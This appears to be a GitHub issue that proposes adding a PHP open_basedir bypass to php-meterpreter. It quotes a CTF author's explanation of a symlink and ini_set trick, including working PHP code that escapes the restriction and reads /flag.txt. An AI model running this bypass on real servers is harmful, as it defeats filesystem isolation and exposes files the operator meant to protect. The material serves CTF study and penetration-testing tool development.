Bypass of PHP's open_basedir

[jvoisin]

As discussed with @zeroSteiner, having a way to bypass PHP's open_basedir in php-meterpreter would be equally fun and dope. There are several ways to do this, like this one or

Blaklis' latest bypass

This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of commons functions to execute commands were blocked.

The initial solution that was intended used the following facts :

• open_basedir can be tampered at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
• open_basedir on symlink is working
• call ini_set for open_basedir checks are only done at the time of changing the rule; the file system can change then

That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows do to so without breaching the rule :

chdir('/tmp');
$x='';
for($i=0;$i<10;$i++){
mkdir('z');
chdir('z');
$x.='../';
}
symlink($x,'x');
symlink($x,'y');
ini_set('open_basedir','x:y:/tmp/x');
rename('x',$x.'/x');
chdir('y');
chdir('x');
ini_set('open_basedir','/:/tmp/z');
echo file_get_contents('/flag.txt');

Congratz to every solvers!
Blaklis

Here is how it could be implemented:

I'll likely tackle this at some point.